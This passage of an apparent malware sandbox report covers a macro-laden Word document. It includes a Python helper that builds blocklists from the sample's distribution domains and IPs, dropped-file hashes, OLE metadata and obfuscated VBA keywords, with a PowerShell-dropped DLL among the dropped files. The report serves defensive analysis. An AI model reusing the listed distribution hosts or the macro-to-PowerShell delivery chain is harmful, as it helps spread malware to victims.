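    ("khanhhoahomnay.net", "210.86.239.69", "dat_513543.doc", "/wordpress/CGMC/"),
]


def is_cdn_ip(ip: str) -> bool:
    """True when the address falls inside one of the shared CDN prefixes."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CDN_PREFIXES)


def build_indicators(rows):
    """Split context rows into indicator sets a blocklist can actually use.

    block_ip      : IPs of directly hosted servers (safe to block by address)
    block_domain  : every distribution domain
    block_url     : domain + path where the table gives one (most precise)
    cdn_fronted   : domain -> CDN edge IPs seen (block by name, not address)
    samples_per_host : how many distinct submissions touched each host
    """
    ind = {
        "block_ip": set(),
        "block_domain": set(),
        "block_url": set(),
        "cdn_fronted": defaultdict(set),
    }
    samples = defaultdict(set)
    for domain, ip, sample, path in rows:
        ind["block_domain"].add(domain)
        if path:
            ind["block_url"].add(domain + path)
        if is_cdn_ip(ip):
            ind["cdn_fronted"][domain].add(ip)
        else:
            ind["block_ip"].add(ip)
        samples[domain].add(sample)
        samples[ip].add(sample)
    ind["cdn_fronted"] = dict(ind["cdn_fronted"])
    ind["samples_per_host"] = {host: len(s) for host, s in samples.items()}
    return ind


if __name__ == "__main__":
    result = build_indicators(CONTEXT_ROWS)
    for key in ("block_ip", "block_domain", "block_url"):
        print(key, sorted(result[key]))
    print("cdn_fronted", result["cdn_fronted"])
    print("samples_per_host", result["samples_per_host"])
```

The same pivot works on the full tables: any host that appears under more than one sample is campaign infrastructure rather than a one-off, and for the CDN-fronted domains the `block_url` entries (domain plus path) are the only indicators that are both precise and stable across the edge addresses.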

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1917291-551E-40AF-9919-E039C2A6E74E}.tmp
                                               Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                               File Type: data
                                               Category: dropped
                                               Size (bytes): 1024
                                               Entropy (8bit): 0.05390218305374581
                                               Encrypted: false
                                               SSDEEP: 3:ol3lYdn:4Wn
                                               MD5: 5D4D94EE7E06BBB0AF9584119797B23A
                                               SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
                                               SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                               SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                               Malicious: false
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
                                               Process: C:\Windows\SysWOW64\rundll32.exe
                                               File Type: data
                                               Category: dropped
                                               Size (bytes): 46
                                               Entropy (8bit): 1.0424600748477153
                                               Encrypted: false
                                               SSDEEP: 3:/lbWwWl:sZ
                                               MD5: 3B7B4F5326139F48EFA0AAE509E2FE58
                                               SHA1: 209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                               SHA-256: D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                               SHA-512: C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                               Malicious: false
                                              Preview: ........................................user.
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MAIL-0573188.LNK
                                               Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                               File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Fri Jan 8 01:44:34 2021, length=170496, window=hide
                                               Category: dropped
                                               Size (bytes): 2048
                                               Entropy (8bit): 4.530199404833512
                                               Encrypted: false
                                               SSDEEP: 24:8i/XTwz6IknLG6WeD6fDv3q8dM7dD2i/XTwz6IknLG6WeD6fDv3q8dM7dV:8i/XT3IkL408Qh2i/XT3IkL408Q/
                                               MD5: 4DF39A955577FBDA718F9D744D03D389
                                               SHA1: 1F96596530013454CB944E4693228373D9BF8504
                                               SHA-256: 970267C26980A032F6BB5CB8D5FD612C80629BAE750CEF7098FA4C11B04C28F0
                                               SHA-512: B4A840E49540EFAD08E21352CCC5F3F202099BBA18435B18893A17D7ACB27D1A3D2EE34CE5FC3D95E61212C64FB84D3816CC9757987907033F0C4851399D53C2
                                               Malicious: false
                                              Preview: L..................F.... ...[._..{..[._..{.....2h................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2.....(R.. .MAIL-0~1.DOC..N.......Q.y.Q.y*...8.....................M.A.I.L.-.0.5.7.3.1.8.8...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\MAIL-0573188.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.A.I.L.-.0.5.7.3.1.8.8...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N...W...9F.C...........[D_....3N...W
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                               Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                               File Type: ASCII text, with CRLF line terminators
                                               Category: dropped
                                               Size (bytes): 74
                                               Entropy (8bit): 4.3607066630908955
                                               Encrypted: false
                                               SSDEEP: 3:M15spzAXCw/AXCmX15spzAXCv:MMpEKUpEc
                                               MD5: 76E48FC73FE7372631FFFC13033A5895
                                               SHA1: 3F72CAC7C77D9A1647FE86E6EDA4FE8914349C28
                                               SHA-256: ADE4E1003850612E9367818208AE5BD93DADFAFE4E7A5DFBA12969AB807BE60C
                                               SHA-512: A50068261A09A9A220627DCA913E255B1CF7DF275DC884D8B898A91E66C28D9E781DF4A009CD82364D3734852FFE390BCC865824B65EBAB66B2184A393F3763C
                                               Malicious: false
                                              Preview: [doc]..MAIL-0573188.LNK=0..MAIL-0573188.LNK=0..[doc]..MAIL-0573188.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                               Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                               File Type: data
                                               Category: dropped
                                               Size (bytes): 162
                                               Entropy (8bit): 2.431160061181642
                                               Encrypted: false
                                               SSDEEP: 3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                               MD5: 6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                               SHA1: 6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                               SHA-256: CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                               SHA-512: B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                               Malicious: false
                                              Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\20G6ZLCGULCSH5TY8WGA.temp
                                               Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                               File Type: data
                                               Category: dropped
                                               Size (bytes): 8016
                                               Entropy (8bit): 3.5848677611288466
                                               Encrypted: false
                                               SSDEEP: 96:chQCsMq2yqvsqvJCwomz8hQCsMq2yqvsEHyqvJCworczkKY2PHFf8R/MlUVoIu:cykomz8ywHnorczkOf8R4Iu
                                               MD5: 975DDE3BEB992D275DFD4DD1F527950A
                                               SHA1: 14DCBA69A937054538AFBB71BEC3B98CD9D80FB8
                                               SHA-256: 254E0DC72C97BCF7AC365492C16C07DF602BE3D408DD827276282F50C4A0EFB4
                                               SHA-512: 100E34A41FF78016C4728DBB19B5D5980C5B9619CCFE145F06A0D4D17C33AC4766BF3CFB8483686163AFCBD532DB0639A31E22D8C1A9D7FC355C3E97B4FFE784
                                               Malicious: false
                                              Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                              C:\Users\user\Desktop\~$IL-0573188.doc
                                               Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                               File Type: data
                                               Category: dropped
                                               Size (bytes): 162
                                               Entropy (8bit): 2.431160061181642
                                               Encrypted: false
                                               SSDEEP: 3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
                                               MD5: 6AF5EAEBE6C935D9A5422D99EEE6BEF0
                                               SHA1: 6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
                                               SHA-256: CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
                                               SHA-512: B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
                                               Malicious: false
                                              Preview: .user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...
                                              C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll
                                               Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                               File Type: data
                                               Category: dropped
                                               Size (bytes): 196317
                                               Entropy (8bit): 7.475350289212884
                                               Encrypted: false
                                               SSDEEP: 3072:CbwbpDnn9FdrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:Cbsl9FdaBYF0nVp2MJHybR8dS9
                                               MD5: 3771989E5967540F6AABFD211CCFA9F1
                                               SHA1: 8C4B4D489EC21B0F8F7613E767E248F511257F61
                                               SHA-256: F3A6E22AF9D7C859F8CACC9AE43155CE6EDA005579FC7C8F195FB91D4C0D3B22
                                               SHA-512: 9DD2011907FE42D47AD7867D405EB18FD4906B63E600DEEC36C4351DBA363E88915638B74FB2172AC7F7DB90687BEB36358A13A0365F0DFF8F8F93C66A214253
                                               Malicious: false
                                              Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Argentina Pass Adaptive transitional override payment haptic Handcrafted Cotton Towels, Author: Jade Clement, Template: Normal.dotm, Last Saved By: Jade Moreau, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 10:15:00 2021, Last Saved Time/Date: Tue Jan 5 10:15:00 2021, Number of Pages: 1, Number of Words: 2640, Number of Characters: 15049, Security: 8
                                              Entropy (8bit):6.7084953616032434
                                              TrID:
                                              • Microsoft Word document (32009/1) 79.99%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 20.01%
                                              File name:MAIL-0573188.doc
                                              File size:169983
                                              MD5:7ad5e41d03b2dfe72af417fa5b0cc164
                                              SHA1:2a6c0fa93aba9ce560d271ce65d79db69422fc6c
                                              SHA256:2d6cbcbc803638a13705a3b26afb3b34b72bc58601215566ba858c62882b8e61
                                              SHA512:83bc8a65c0316660f42a6d3cd4ed7e7432dd939ffa4b408f1f40d59cf2c7a842271a19b21308d5bc56de0ff382b9db7e8e05ff159e332588e02ca50b762a4ca8
                                              SSDEEP:3072:4D9ufstRUUKSns8T00JSHUgteMJ8qMD7gm:4D9ufsfgIf0pLm

                                              File Icon

                                              Icon Hash:e4eea2aaa4b4b4a4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "MAIL-0573188.doc"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:Microsoft Office Word
                                              Encrypted Document:False
                                              Contains Word Document Stream:True
                                              Contains Workbook/Book Stream:False
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1252
                                              Title:
                                              Subject:Argentina Pass Adaptive transitional override payment haptic Handcrafted Cotton Towels
                                              Author:Jade Clement
                                              Keywords:
                                              Comments:
                                              Template:Normal.dotm
                                              Last Saved By:Jade Moreau
                                              Revision Number:1
                                              Total Edit Time:0
                                              Create Time:2021-01-05 10:15:00
                                              Last Saved Time:2021-01-05 10:15:00
                                              Number of Pages:1
                                              Number of Words:2640
                                              Number of Characters:15049
                                              Creating Application:Microsoft Office Word
                                              Security:8

                                              Document Summary

                                              Document Code Page:-535
                                              Number of Lines:125
                                              Number of Paragraphs:35
                                              Thumbnail Scaling Desired:False
                                              Company:
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:917504

                                              Streams with VBA

                                              VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117
                                              General
                                              Stream Path:Macros/VBA/A5gd21klfqu9c6rs
                                              VBA File Name:A5gd21klfqu9c6rs
                                              Stream Size:1117

                                              VBA Code Keywords

                                              Keyword
                                              False
                                              Private
                                              VB_Exposed
                                              Attribute
                                              VB_Creatable
                                              VB_Name
                                              Document_open()
                                              VB_Customizable
                                              VB_PredeclaredId
                                              VB_GlobalNameSpace
                                              VB_Base
                                              VB_TemplateDerived
                                              VBA Code
                                              VBA File Name: Owppnp8hah4xo788, Stream Size: 17915
                                              General
                                              Stream Path:Macros/VBA/Owppnp8hah4xo788
                                              VBA File Name:Owppnp8hah4xo788
                                              Stream Size:17915

                                              VBA Code Keywords

                                              Keyword
                                              DpYbmDA
                                              oAaNlB
                                              vrYYHIDxI
                                              WTbkNqFa
                                              Object
                                              RjiQHRA
                                              "bBmgOCvPPojGGC"
                                              MNihxICY
                                              DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                                              GfRPP
                                              tWcKo
                                              OMZxxg
                                              "lwWhZGEasjsS"
                                              "deVdMyoREdgzCaJb"
                                              fDZVKAAc:
                                              uWZkeMFv.WriteLine
                                              xLQtMd
                                              nleaHR
                                              gEcrV:
                                              "OyFBLhlWUnD"
                                              uWZkeMFv.Close
                                              xsruLB
                                              zDsRaIBGF
                                              mgrwfmN
                                              "XZzpBRpDKuMgsGHIHF"
                                              "VrVKCjefsIJ"
                                              pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
                                              SblcDCC:
                                              SQQWY
                                              "hbtzFRJEXyDCXI"
                                              iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                                              sCOIGDtD:
                                              gxBPJB
                                              jbUmDI
                                              DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                                              "BnxHFzJCGhVHrFIm"
                                              IcAHwPH
                                              iFTmFHFH
                                              STzBjwICv
                                              kwzjKvZHe
                                              fDZVKAAc.WriteLine
                                              plqkuDI
                                              RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
                                              ZMdrVHGz:
                                              SeHafBC
                                              nhLeJMLfI
                                              EISYDDB
                                              EhCMG
                                              UDSpFHqFJ
                                              WlBWDXGD
                                              "NisSEYrcDlKQUITa"
                                              "dXFPCSYtSNB"
                                              "NeiIGCNWgICn"
                                              OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                                              mgrwfmN.Close
                                              YVZXECEHD
                                              FLtYjKHC
                                              GfRPP.Close
                                              idbaDIr
                                              "dnUnKFHAkIOdD"
                                              "nJJzFRjEWpRikxCD"
                                              ANzGyzCD
                                              MmSDYCkJR
                                              "hKlajOujwgDFAA"
                                              "eeVVJBMGlcfXMB"
                                              RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                                              iHKuDmaEr:
                                              "CcDmClHsnCC"
                                              "UjBKOEDRIbiWFB"
                                              QOrvJEB
                                              "sxbwAfRtWJI"
                                              UskmBJF
                                              "KqVyuQQfwTWh"
                                              tpOgXmm
                                              fiyQuiRBI
                                              gphNDVZp
                                              vEBqHrDnD
                                              PbhYVsA.Close
                                              ZMdrVHGz.Close
                                              "vVbvIHcFGEAJJ"
                                              CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                                              KmGOADt
                                              Resume
                                              phIwFD
                                              jPJENIo
                                              AiRdGDAJ
                                              KmGOADt.Close
                                              "]an"
                                              PnolTIbAB
                                              "eEWdaDQVJJqTHgF"
                                              gxBPJB:
                                              eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                                              FYVZFEH
                                              tzErBRFe
                                              "LvnHAGHfIhRDBRAF"
                                              NuebA:
                                              sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                                              oQgLUI
                                              SblcDCC.Close
                                              HCvCmAcHC
                                              "eXpjHFapHaPdRJu"
                                              eepvDEaE
                                              "DBvMcNtCcMyJDDI"
                                              MHYlQAD
                                              "ekluIEBJFIgoBcGC"
                                              dXiwA
                                              "MiCjaGqJfPrI"
                                              eCIzUDyJ
                                              RyDBDK
                                              hFSyAfFrF
                                              "fDdPHEjBEnAdZqZFJ"
                                              zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                                              "MxCpGaGqBgemCAFEJ"
                                              PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                                              sCOIGDtD.Close
                                              uWZkeMFv
                                              gzTFLxb
                                              IePCGy
                                              swNGWdd
                                              qHKYGHlFA
                                              OIbfvEEFF
                                              CHVmaVC
                                              ZMdrVHGz
                                              TXmxvp
                                              quDoH
                                              iHKuDmaEr.WriteLine
                                              KXTliE
                                              ddanFDWJf
                                              rJEkbLH
                                              fNhiCVgGS:
                                              noebIvSiu
                                              YZllAeRe
                                              VB_Name
                                              "eXObOTlBAITEOIo"
                                              mgrwfmN:
                                              LzxxRHG
                                              inIcjJtaF
                                              EKmLA
                                              uVItICICB
                                              mgrwfmN.WriteLine
                                              KXwaABT
                                              fDZVKAAc.Close
                                              Mid(Application.Name,
                                              fmwdEMADQ
                                              lBenBDA
                                              SblcDCC
                                              mgTNFCq
                                              NuebA.WriteLine
                                              hXxQDACJA
                                              KmGOADt.WriteLine
                                              HCvCmAcHC.Close
                                              yJmmmVIAG
                                              rYbgBh:
                                              iHKuDmaEr.Close
                                              NuebA.Close
                                              hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                                              ZMdrVHGz.WriteLine
                                              OlapGi
                                              zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                                              "CVbRCAAhkhmcDG"
                                              HCvCmAcHC:
                                              BNmrm
                                              rYbgBh
                                              "WNFUDvHgghFdup"
                                              uRnkDGJ
                                              "qiXBsMBsLJGbX"
                                              yabVbA
                                              zBSWCKmJv
                                              bbsIZ
                                              "zdTcdOoXXUFHJK"
                                              xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                                              RqlOZAHRJ
                                              fNhiCVgGS.WriteLine
                                              hjZwD
                                              "EgxfIDVQbJotWhj"
                                              "BUUJYAAIoJvLBLAo"
                                              PcHRGIADo
                                              wTMSLyWFG
                                              sCOIGDtD
                                              PbhYVsA:
                                              "BndJDkuVYF"
                                              KmGOADt:
                                              "RhnJRGeBNASBQHHGF"
                                              anyPG
                                              "JTSPCDjykfL"
                                              sreXHFD
                                              "XrrAwQZPjqB"
                                              hoyzuBGCP
                                              UavHTIBHo
                                              qAUhkIMz
                                              EKezHIC
                                              PjNhJNA
                                              GznGGHyG
                                              UwyYSBsBN
                                              ORLICIl
                                              cwsTFPCH
                                              "]anw["
                                              drZcHkCm
                                              hDJDJ
                                              NXbmIuHX
                                              Function
                                              "syYTHJShrguhzb"
                                              AioOpBFE
                                              xiFRA
                                              fmwdEMADQ.WriteLine
                                              gxBPJB.Close
                                              NZiApKAp
                                              gEcrV.Close
                                              "mehEFPFHcklgJDDx"
                                              iHKuDmaEr
                                              pULquU
                                              SblcDCC.WriteLine
                                              pkixJADG:
                                              xkQqDXCcD
                                              GIAKA
                                              "TubioGUTLadgXbA"
                                              "anBQXljzGenE"
                                              xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                                              fDZVKAAc
                                              ecGmY
                                              "ptABFEZDmkMVIeD"
                                              "TBKmUCEXTUIGu"
                                              "fxSJajCGlWUEBW"
                                              rYbgBh.WriteLine
                                              DhnHIY
                                              sCOIGDtD.WriteLine
                                              tAmQHxlD
                                              tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                                              "wypNISsWSXthFJCq"
                                              eLmLDU
                                              jENfzNH
                                              gEcrV.WriteLine
                                              Nothing
                                              "uTtCAFwHpCGF"
                                              PbhYVsA
                                              gEcrV
                                              NuebA
                                              "aqGiHISIbAoabV"
                                              fNhiCVgGS.Close
                                              jsYAGBJAF
                                              RhztCF
                                              lADFBaJ
                                              FUyIHBDFz
                                              sPkIwu
                                              ViWsSIH
                                              gxBPJB.WriteLine
                                              zZuzBZGD
                                              pkixJADG.WriteLine
                                              MznOjBB
                                              fmwdEMADQ.Close
                                              sTzDC
                                              "oLweAMoGsqVE"
                                              diCXTi
                                              GfRPP.WriteLine
                                              Error
                                              uWZkeMFv:
                                              xPBGH
                                              Attribute
                                              sySRJ
                                              "WLXLJnjItPGPZJ"
                                              "JMgUDAIEJlgyNBH"
                                              jzqBlGW
                                              CFdSBD
                                              pkixJADG.Close
                                              ibIiBF
                                              "qDaYIDDSZQMTaO"
                                              pkixJADG
                                              GfRPP:
                                              LQqlBAHD
                                              dLRiF
                                              "ImJJdfAtdFHCh"
                                              PbhYVsA.WriteLine
                                              DkLoDL
                                              RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                                              fNhiCVgGS
                                              fmwdEMADQ:
                                              rYbgBh.Close
                                              zxgLHJSFW
                                              HCvCmAcHC.WriteLine
                                              hZCth
                                              VBA Code
                                              VBA File Name: Zdjtk46nm17voo, Stream Size: 701
                                              General
                                              Stream Path:Macros/VBA/Zdjtk46nm17voo
                                              VBA File Name:Zdjtk46nm17voo
                                              Stream Size:701

                                              VBA Code Keywords

                                              Keyword
                                              Attribute
                                              VB_Name
                                              VBA Code

                                              Streams

                                              Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                              General
                                              Stream Path:\x1CompObj
                                              File Type:data
                                              Stream Size:146
                                              Entropy:4.00187355764
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                              Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                              General
                                              Stream Path:\x5DocumentSummaryInformation
                                              File Type:data
                                              Stream Size:4096
                                              Entropy:0.280929556603
                                              Base64 Encoded:False
                                              Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 508
                                              General
                                              Stream Path:\x5SummaryInformation
                                              File Type:data
                                              Stream Size:508
                                              Entropy:3.93936573804
                                              Base64 Encoded:False
                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                              Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 cc 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 6c 01 00 00 04 00 00 00 54 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                              Stream Path: 1Table, File Type: data, Stream Size: 6412
                                              General
                                              Stream Path:1Table
                                              File Type:data
                                              Stream Size:6412
                                              Entropy:6.14518057053
                                              Base64 Encoded:True
                                              Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                              Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                              Stream Path: Data, File Type: data, Stream Size: 99192
                                              General
                                              Stream Path:Data
                                              File Type:data
                                              Stream Size:99192
                                              Entropy:7.3901039161
                                              Base64 Encoded:True
                                              Data ASCII:x . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . A . C . = . > . : . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . . . . . . D . . . . . = . . F . . . . . . % . . P . 5 . . w . ? . . . . . . . . . . .
